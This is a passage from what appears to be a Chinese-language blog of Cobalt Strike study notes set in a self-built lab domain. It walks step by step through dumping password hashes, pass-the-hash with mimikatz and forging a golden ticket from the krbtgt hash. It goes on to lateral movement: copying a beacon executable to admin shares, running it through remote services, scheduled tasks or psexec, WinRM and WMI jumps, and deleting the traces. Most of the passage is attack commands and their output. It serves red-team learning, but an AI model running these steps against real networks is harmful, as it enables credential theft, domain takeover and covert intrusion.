</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这两种方法，在之前的笔记中都或多或少的提及过，这里不再过多赘述。</p> <h3 id="密码哈希">密码哈希 <a href="#密码哈希" class="header-anchor">#</a></h3> <p>使用 mimikatz 获取密码哈希</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>pth DOMAIN\user ntlmhash
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如何工作的？</p> <p>1、mimikatz 使用登录令牌开启了一个进程，在单点登录信息那里填入我们提供的用户名称、域、密码哈希值</p> <p>2、cobalt strike 自动的从那个进程中窃取令牌并关闭</p> <p>首先使用 <code>hashdump</code> 获取用户的密码哈希值，这里的 beacon 会话为 SYSTEM 权限。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; hashdump
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to dump hashes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 82501 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Daniel:1000:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
TeamsSix:1002:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>使用 <code>pth</code> 获取信任</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; pth TEAMSSIX\Administrator 12cb161bvca930994x00cbc0aczf06d1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 23 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run mimikatz's sekurlsa::pth <span class="token operator">/</span>user:Administrator <span class="token operator">/</span>domain:TEAMSSIX <span class="token operator">/</span>ntlm:12cb161bvca930994x00cbc0aczf06d1 <span class="token operator">/</span>run:<span class="token string">&quot;%COMSPEC% /c echo ade660d8dce &gt; \\.\pipe\8d3e4c&quot;</span> command
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 750600 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 71 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated NT AUTHORITY\SYSTEM
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
user	: Administrator
domain	: TEAMSSIX
program	: C:\Windows\system32\cmd<span class="token punctuation">.</span>exe <span class="token operator">/</span>c <span class="token function">echo</span> ade660d8dce &gt; \\<span class="token punctuation">.</span>\pipe\8d3e4c
impers<span class="token punctuation">.</span>	: no
NTLM	: 12cb161bvca930994x00cbc0aczf06d1
  <span class="token punctuation">|</span>  PID  2992
  <span class="token punctuation">|</span>  TID  5028
  <span class="token punctuation">|</span>  LSA <span class="token keyword">Process</span> is now R<span class="token operator">/</span>W
  <span class="token punctuation">|</span>  LUID 0 <span class="token punctuation">;</span> 14812112 <span class="token punctuation">(</span>00000000:00e203d0<span class="token punctuation">)</span>
  \_ msv1_0   <span class="token operator">-</span> <span class="token keyword">data</span> <span class="token function">copy</span> @ 0000000001794E80 : OK <span class="token operator">!</span>
  \_ kerberos <span class="token operator">-</span> <span class="token keyword">data</span> <span class="token function">copy</span> @ 000000000044A188
   \_ aes256_hmac       <span class="token operator">-</span>&gt; null             
   \_ aes128_hmac       <span class="token operator">-</span>&gt; null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ <span class="token operator">*</span>Password replace @ 00000000017DA1E8 <span class="token punctuation">(</span>16<span class="token punctuation">)</span> <span class="token operator">-</span>&gt; null

beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 231 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br></div></div><h3 id="kerberos-票据">Kerberos 票据 <a href="#kerberos-票据" class="header-anchor">#</a></h3> <p>关于 Kerberos 的介绍可以查看知乎上的一篇文章，比较形象生动，文章地址： <a href="https://www.zhihu.com/question/22177404" target="_blank" rel="noopener noreferrer">https://www.zhihu.com/question/22177404<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>查看有哪些 Kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell klist
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>除去 kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>kerberos_ticket_purge
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>加载 kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>kerberos_ticket_use <span class="token punctuation">[</span><span class="token operator">/</span>path<span class="token operator">/</span>to<span class="token operator">/</span>file<span class="token punctuation">.</span>ticket<span class="token punctuation">]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="黄金票据">黄金票据 <a href="#黄金票据" class="header-anchor">#</a></h3> <p>黄金票据 <code>Golden Ticket</code> 是 KRBTGT 帐户的 Kerberos 身份验证令牌，KRBTGT 帐户是一个特殊的隐藏帐户，用于加密 DC 的所有身份验证令牌。然后黄金票据可以使用哈希传递技术登录到任何帐户，从而使攻击者可以在网络内部不受注意地移动。</p> <p><strong>使用 mimikatz 伪造黄金票据需要：</strong></p> <p><strong>1、目标的用户名及域名</strong></p> <p><strong>2、域的 SID 值</strong></p> <p>域的 SID 值即安全标识符 <code>Security Identifiers</code>，使用 <code>whoami /user</code> 命令可查看，注意不需要 SID 最后的一组数字。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell whoami <span class="token operator">/</span>user
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: whoami <span class="token operator">/</span>user
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 43 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

用户信息
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>

用户名        SID                                         
============= ============================================
teamssix\daniel S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>21<span class="token operator">-</span>5311978431<span class="token operator">-</span>183514165<span class="token operator">-</span>284342044<span class="token operator">-</span>1000
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p>因为不需要 SID 最后一组数字，所以这里要使用的 SID 也就是 <code>S-1-5-21-5311978431-183514165-284342044</code></p> <p><strong>3、DC 中  KRBTGT  用户的 NTLM 哈希</strong></p> <p>DC 中  KRBTGT  用户的 NTLM 哈希可以通过 dcsync 或 hashdump 获得，下面的 hashdump 命令在域控制器的 SYSTEM 权限会话下运行。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; hashdump
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to dump hashes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 82501 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aca3b435b5z404eeaad3f435b51404he:z1f8417a00az34scwb0dc15x66z43bg1:::
daniel:1108:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>Cobalt Strike 在 <code>Access -&gt; Golden Ticket</code> 中可以打开生成黄金票据的界面。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs18-1.png" alt=""></p> <p>信息填完之后，选择 Build，需要注意 Domain 需要填写成 FQDN 格式，即完全合格域名 <code>Fully Qualified Domain Name</code> ，也就是类似于 <code>teamssix.com</code> 的格式。</p> <p>此时可以通过 <code>shell dir \\host\C$</code> 检查自己是否有权限，也可以使用 PowerShell 运行 whoami 查看自己是谁。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 203 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="_5、远程代码执行">5、远程代码执行 <a href="#_5、远程代码执行" class="header-anchor">#</a></h2> <p>实现代码执行的四个步骤：</p> <p>1、与目标建立信任关系</p> <p>2、复制可执行文件到目标上</p> <p>3、在目标上运行可执行文件</p> <p>4、实现对目标的控制</p> <p>以上是根据视频教程中直译的结果，个人感觉其实这一节叫<code>横向移动的方法</code>更为合适。</p> <p><strong>创建可执行文件</strong></p> <p>创建可执行文件可以在 Cobalt Strike 的 <code>Attack -&gt; Packages -&gt; Windows Executable(s)</code> 处进行创建。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs19-1.png" alt=""></p> <p>如果用于内网中的横向移动，那么强烈建议使用 SMB Beacon，SMB Beacon 就是为了内网横向扩展渗透而设计的。</p> <p><strong>上传可执行文件</strong></p> <p>首先使用 Cobalt Strike 上的 <code>upload</code> 功能上传文件，接着复制文件到目标主机的其他位置。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">copy</span> file<span class="token punctuation">.</span>exe \\host\C$\Windows\Temp
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; upload <span class="token operator">/</span>root<span class="token operator">/</span>beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to upload <span class="token operator">/</span>root<span class="token operator">/</span>Desktop<span class="token operator">/</span>beacon<span class="token punctuation">.</span>exe as beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 289302 bytes

beacon&gt; shell <span class="token function">copy</span> beacon<span class="token punctuation">.</span>exe \\WinTest\C$\Windows\Temp
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">copy</span> beacon<span class="token punctuation">.</span>exe \\WinTest\C$\Windows\Temp
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 72 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
已复制         1 个文件。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>执行文件（方法一）</strong></p> <p>1、生成 Windows Service EXE 并上传</p> <p>2、在目标主机上创建一个服务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">sc</span> \\host create name binpath= c:\windows\temp\file<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">sc</span> \\wintest create beacon binpath= c:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest create beacon binpath= c:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 93 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
<span class="token namespace">[SC]</span> CreateService 成功
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><blockquote><p>注：记住 binpath 路径</p></blockquote> <p>3、在目标主机上启动服务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">sc</span> \\host <span class="token function">start</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">sc</span> \\wintest <span class="token function">start</span> beacon
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest <span class="token function">start</span> beacon
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 56 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
SERVICE_NAME: beacon 
        <span class="token function">TYPE</span>               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                <span class="token punctuation">(</span>NOT_STOPPABLE<span class="token punctuation">,</span> NOT_PAUSABLE<span class="token punctuation">,</span> IGNORES_SHUTDOWN<span class="token punctuation">)</span>
        WIN32_EXIT_CODE    : 0  <span class="token punctuation">(</span>0x0<span class="token punctuation">)</span>
        SERVICE_EXIT_CODE  : 0  <span class="token punctuation">(</span>0x0<span class="token punctuation">)</span>
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3816
        FLAGS              : 
        
beacon&gt; link wintest
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked to link to \\wintest\pipe\msagent_da00
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 36 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>130
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>4、清除痕迹与服务</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>shell sc \\host delete name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">del</span> beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">del</span> beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 57 bytes

beacon&gt; shell <span class="token function">del</span> \\wintest\C$\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">del</span> \\wintest\C$\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 83 bytes

beacon&gt; shell <span class="token function">sc</span> \\wintest delete beacon
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">sc</span> \\wintest delete beacon
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 69 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
<span class="token namespace">[SC]</span> DeleteService 成功
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>执行文件（方法二）</strong></p> <p>1、生成 Windows EXE 并上传，注意这里生成的 EXE 和<code>方法一</code>生成的 EXE 是不一样的类型，这里生成的是<code>Windows EXE</code>，不是方法一中的<code>Windows Service EXE</code></p> <p>2、找到目标系统上的时间</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell net time \\host
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net time \\windc
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net time \\windc
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 49 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
\\windc 的当前时间是 2020<span class="token operator">/</span>8<span class="token operator">/</span>30 14:54:09
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>3、创建一个计划任务</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell at \\host HH:mm C:\path\to\bad<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell at \\windc 15:00 C:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\windc 15:00 C:\windows\temp\beacon<span class="token punctuation">.</span>exe
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 76 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
新加了一项作业，其作业 ID = 1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>4、当计划任务被执行时，执行 link hostname 即可上线主机</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; link windc
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked to link to \\windc\pipe\msagent_d76a
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 34 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>144
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>beacon 的自动操作</strong></p> <p>前面说的两种执行文件的方法都需要往磁盘里上传文件，如果不想往磁盘中上传文件，也可以使用 beacon 的自动操作。</p> <ul><li>使用一个服务运行可执行文件</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>psexec <span class="token namespace">[target]</span> <span class="token namespace">[share]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>使用一个服务运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>psexec_psh <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>通过 WinRM 运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>winrm <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><ul><li>通过 WMI 运行 Powershell 单行程序</li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>wmi <span class="token namespace">[target]</span> <span class="token namespace">[listener]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在 Cobalt Strike 的 <code>viwe --&gt; Targets</code> 下，右击主机选择 <code>Jump</code> 也可以通过图形化的方式进行上述操作，这样也使得横向移动更加的简单。</p> <p>接下来进行一下演示，目前手中有一个普通机器的管理员会话，我们先在这台机器上运行 <code>net view</code> 查看一下当前域环境中的主机信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net view
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net view
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104504 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
List of hosts:
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 Server Name             IP Address                       Platform  Version  <span class="token function">Type</span>   Comment
 <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>             <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>                       <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>            
 WINDC                   192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>144                  500       6<span class="token punctuation">.</span>1      PDC    
 WINTEST                 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>130                  500       6<span class="token punctuation">.</span>1         
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>因为是自己本地搭建的测试环境，所以主机很少，可以看到当前域中有两台机器，再利用 PowerView 查找一下具有本地管理员访问权限的用户</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell<span class="token operator">-</span>import PowerView<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to import: PowerView<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 101224 bytes

beacon&gt; powershell <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 329 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
WinDC<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p>接下来在 WinDC 上运行 psexec，因为这里是 64 位的，所以选择 psexec64，之后监听选择一个 smb beacon，会话就选择已经上线的 wintest 主机的会话，并勾选使用当前会话的访问令牌。</p> <p>这里笔者认为应该是因为当前在 wintest 主机上有 windc 的管理员账户登录着，所以使用 wintest 的访问令牌是可以获取 windc 的信任的，类似于 <a href="https://teamssix.com/year/200419-150622.html" target="_blank" rel="noopener noreferrer">CS 学习笔记 17 节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>里的描述方法，如有不正确之处，还请多多指教。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs19-2.png" alt=""></p> <p>之后，windc 主机就上线了，域中如果还有其他主机，也可以使用这种方法去横向移动。</p> <h1 id="_0x07-转发">0x07 转发 <a href="#_0x07-转发" class="header-anchor">#</a></h1> <h2 id="_1、socks-代理转发">1、SOCKS 代理转发 <a href="#_1、socks-代理转发" class="header-anchor">#</a></h2> <p>在进行转发操作之前，需要将当前会话改为交互模式，也就是说输入命令就被执行，执行 <code>sleep 0</code> 即为交互模式。</p> <h3 id="socks">Socks <a href="#socks" class="header-anchor">#</a></h3> <p><img 